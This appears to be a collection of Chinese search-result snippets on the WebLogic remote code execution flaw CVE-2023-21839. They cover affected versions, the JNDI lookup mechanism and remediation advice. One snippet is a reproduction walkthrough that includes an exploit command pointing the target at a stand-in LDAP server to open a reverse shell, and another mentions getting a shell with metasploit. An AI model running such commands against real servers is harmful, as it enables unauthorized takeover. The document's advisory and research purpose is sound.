今天复现Weblogic远程代码执行漏洞 (CVE-2023-21839),直接使用使用 metasploit 直接反弹shell ,实验结束,metasploit 永远的神。CVE-2023-21839 允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI lookup…
1.Oracle Critical Patch Update Advisory - January 2023 2.pingsafe.com/blog/cve-2 3.docs.oracle.com/html/E8 关于Portal Lab 星阑科技 Portal Lab 致力于前沿安全技术研究及能力工具化。主要研究方向为API 安全、应用安全、攻防对抗等领域。实验室成员研究成果曾发表于BlackHat、HITB、BlueHat、KCon、XCon等国...
(6)然后再在自己本地电脑(放有CVE-2023-21839.exe)运行以下命令: CVE-2023-21839.exe -ip 目标主机IP -port7001-ldap ldap://YourIP:1389/Basic/ReverseShell/YourIP/9988 (7)目标主机成功getshell: 0x03 漏洞原理 由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,未经身份验证的攻击者通过IIOP/T3协...
CVE-2023-21839这一漏洞允许攻击者远程执行代码,获取服务器权限,会对企业网络和数据造成严重损失。因此,长扬科技安全研究院建议您采取以下有效措施来保护Weblogic服务器免受攻击:首先,我们需要对Weblogic服务器进行深入的漏洞分析,了解漏洞的本质和可能产生的影响。通过分析漏洞的原理,我们可以找到漏洞的入口点,并尝...
WebLogic存在远程代码执行漏洞,未经授权的攻击者利用此漏洞通告T3、IIOP协议构造恶意请求发送给WebLogic服务器,成功利用此漏洞后攻击者可以接管WebLogic服务器,并执行任意命令。 影响范围 WebLogic_Server = 12.2.1.3.0 WebLogic_Server = 12.2.1.4.0 WebLogic_Server = 14.1.1.0.0 ...
CVE-2023-21839是一个weblogic的JNDI注入漏洞。 由于Weblogic t3/iiop协议支持远程绑定对象bind到服务端,并且可以通过lookup查看,当远程对象继承自OpaqueReference时,lookup查看远程对象,服务端会调用远程对象getReferent方法。weblogic.deployment.jms.ForeignOpaqueReference继承自OpaqueReference并且实现了getReferent方法,并且存在...
一、漏洞详情 漏洞名称:Weblogic未授权远程代码执行漏洞。影响范围:Oracle Fusion Middleware组件中的WebLogic Server,具体版本包括12.2.1.3.0、12.2.1.4.0和14.1.1.0.0。漏洞原理:漏洞源于WebLogic支持远程绑定对象,并允许通过lookup查看。当远程对象继承自OpaqueReference时,lookup会调用getReferent...
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。影响...
WebLogic存在远程代码执行漏洞(CVE-2023-21839 /CNVD-2023-04389),由于WebLogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server 可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据信息泄露。
CVE-2023-21839 是一个允许远程用户在未经授权的情况下通过 IIOP/T3 协议进行 JNDI lookup 操作,导致代码执行的漏洞。该漏洞源于 WebLogic IIOP/T3 协议存在的缺陷,攻击者可以通过该协议网络访问并攻击存在安全风险的 WebLogic Server。 CVE-2023-21839 对 WebLogic 的影响 远程代码执行:攻击者可以利用该漏洞在目标服...